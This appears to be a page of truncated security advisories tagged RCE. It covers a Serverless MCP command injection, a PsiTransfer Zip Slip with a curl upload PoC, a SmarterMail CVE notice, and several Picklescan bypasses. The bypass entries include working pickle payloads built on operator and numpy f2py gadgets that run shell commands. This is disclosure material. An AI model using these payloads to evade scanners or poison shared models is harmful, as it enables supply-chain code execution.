#rce

### Summary A command injection vulnerability exists in the Serverless Framework's built-in MCP server package (@serverless/mcp). This vulnerability only affects users of the experimental MCP server feature (serverless mcp), which represents less than 0.1% of Serverless Framework users. The core Serverless Framework CLI and deployment functionality are not affected. The vulnerability is caused by the unsanitized use of input parameters within a call to `child_process.exec`, enabling an attacker to inject arbitrary system commands. Successful exploitation can lead to remote code execution under the server process's privileges. The server constructs and executes shell commands using unvalidated user input directly within command-line strings. This introduces the possibility of shell metacharacter injection (`|`, `>`, `&&`, etc.). ### Details The MCP Server exposes several tools, including the `list-project`. The values of the parameter `workspaceRoots` (controlled by the user) is ...

### Summary A Zip Slip vulnerability in PsiTransfer allows an unauthenticated attacker to upload files with path traversal sequences in the filename (e.g. `../../../.ssh/authorized_keys`). When a victim downloads the bucket as a **.tar.gz** archive and extracts it, malicious files are written outside the intended directory, potentially leading to RCE. ### Details The vulnerability exists in the archive download functionality in **lib/endpoints.js** where user controlled metadata.name is used directly without sanitization when creating TAR archive entries. ``` lib/endpoints.js:275 const entry = pack.entry({ name: info.metadata.name, size: info.size }); ``` ``` lib/endpoints.js:372 assert(meta.name, 'tus meta prop missing: name'); ``` ### PoC I. Upload file with malicious filename (no authentication required). ``` MALICIOUS_NAME=$(echo -n "../../../tmp/dp.txt" | base64) SID=$(echo -n "evil" | base64) RETENTION=$(echo -n "3600" | base64) curl -X POST http://TARGET:3000/files \ ...

The Cyber Security Agency of Singapore (CSA) has issued a bulletin warning of a maximum-severity security flaw in SmarterTools SmarterMail email software that could be exploited to achieve remote code execution. The vulnerability, tracked as CVE-2025-52691, carries a CVSS score of 10.0. It relates to a case of arbitrary file upload that could enable code execution without requiring any

### Summary Picklescan uses _operator.attrgetter, which is a built-in python library function to execute remote pickle files. ### Details The attack payload executes in the following steps: - First, the attacker crafts the payload by calling the _operator.attrgetter function in the reduce method. - Then, when the victim, after checking whether the pickle file is safe by using the Picklescan library and finding that this library doesn't detect any dangerous functions, decides to call pickle.load() on this malicious pickle file, it leads to remote code execution. ### PoC ``` import pickle import pickletools opcode3 = b'''cbuiltins __import__ (Vos tRp0 0c_operator attrgetter (Vsystem tR(g0 tR(Vecho "pwned by _operator.attrgetter" tR.''' pickletools.dis(opcode3) pickle.loads(opcode3) ``` This PoC can't be easily create by pickle.dumps, so it was manually built. ### Impact Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. Attac...

### Summary Picklescan uses _operator.methodcaller, which is a built-in python library function to execute remote pickle files. ### Details The attack payload executes in the following steps: - First, the attacker crafts the payload by calling to _operator.methodcaller function in reduce method - Then when after the victim after checks whether or not the pickle file is safe by using Picklescan library and the library doesn't dectect any dangerous functions, pickle.load() loads this malicious pickle file, thus lead to remote code execution. ### PoC ``` import pickle import pickletools opcode2 = b'''cbuiltins __import__ (Vos tRp0 0c_operator methodcaller (Vsystem Vecho "pwned by _operator.methodcaller" tR(g0 tR.''' pickletools.dis(opcode2) pickle.loads(opcode2) ``` This PoC can't be easily create by pickle.dumps, so it was manually built. ### Impact Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. Attackers can embed mali...

### Summary Picklescan uses the `numpy.f2py.crackfortran._eval_length` function (a NumPy F2PY helper) to execute arbitrary Python code during unpickling. ### Details Picklescan fails to detect a malicious pickle that uses the gadget `numpy.f2py.crackfortran._eval_length` in `__reduce__`, allowing arbitrary command execution when the pickle is loaded. A crafted object returns this function plus attacker‑controlled arguments; the scan reports the file as safe, but pickle.load() triggers execution. ### PoC ```python class PoC: def __reduce__(self): from numpy.f2py.crackfortran import _eval_length return _eval_length, ("__import__('os').system('whoami')", None) ``` ### Impact - Arbitrary code execution on the victim machine once they load the “scanned as safe” pickle / model file. - Affects any workflow relying on Picklescan to vet untrusted pickle / PyTorch artifacts. - Enables supply‑chain poisoning of shared model files. ### Credits - [ac0d3r](https://github.c...

### Summary Picklescan uses the `numpy.f2py.crackfortran.getlincoef` function (a NumPy F2PY helper) to execute arbitrary Python code during unpickling. ### Details Picklescan fails to detect a malicious pickle that uses the gadget `numpy.f2py.crackfortran.getlincoef` in `__reduce__`, allowing arbitrary command execution when the pickle is loaded. A crafted object returns this function plus attacker‑controlled arguments; the scan reports the file as safe, but pickle.load() triggers execution. ### PoC ```python class PoC: def __reduce__(self): from numpy.f2py.crackfortran import getlincoef return getlincoef, ("__import__('os').system('whoami')", None) ``` ### Impact - Arbitrary code execution on the victim machine once they load the “scanned as safe” pickle / model file. - Affects any workflow relying on Picklescan to vet untrusted pickle / PyTorch artifacts. - Enables supply‑chain poisoning of shared model files. ### Credits - [ac0d3r](https://github.com/ac0d3...

### Summary Picklescan uses numpy.f2py.crackfortran.param_eval, which is a function in numpy to execute remote pickle files. ### Details The attack payload executes in the following steps: - First, the attacker crafts the payload by calling the numpy.f2py.crackfortran.param_eval function via reduce method. - Then, when the victim checks whether the pickle file is safe by using the Picklescan library and this library doesn't detect any dangerous functions, they decide to use pickle.load() on this malicious pickle file, thus leading to remote code execution. ### PoC ``` class RCE: def __reduce__(self): from numpy.f2py.crackfortran import param_eval return (param_eval,("os.system('ls')",None,None,None)) ``` ### Impact Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Attackers can distrib...

### Summary Picklescan uses numpy.f2py.crackfortran.myeval, which is a function in numpy to execute remote pickle files. ### Details The attack payload executes in the following steps: - First, the attacker crafts the payload by calling the numpy.f2py.crackfortran.myeval function in its reduce method - Then, when the victim checks whether the pickle file is safe by using the Picklescan library and this library doesn't detect any dangerous functions, they decide to use pickle.load() on this malicious pickle file, thus leading to remote code execution. ### PoC ``` class RCE: def __reduce__(self): from numpy.f2py.crackfortran import myeval return (myeval, ("os.system('ls')",)) ``` ### Impact Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Attackers can distribute infected pickle files ac...

### Summary Picklescan uses `operator.methodcaller`, which is a built-in python library function to execute remote pickle files. ### Details The attack payload executes in the following steps: - First, the attacker crafts the payload by calling the `operator.methodcaller` function in method `reduce`. - Then, when the victim checks whether the pickle file is safe using the Picklescan library and this library doesn't detect any dangerous functions, they decide to use pickle.load() on this malicious pickle file, thus leading to remote code execution. ### PoC ``` import pickle import pickletools opcode1 = b'''cbuiltins __import__ (Vos tRp0 0coperator methodcaller (Vsystem Vecho "pwned by operator.methodcaller" tR(g0 tR.''' pickletools.dis(opcode1) pickle.loads(opcode1) ``` This PoC can't be easily created by pickle.dumps, therefore it was manually built. ### Impact Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. Attackers ca...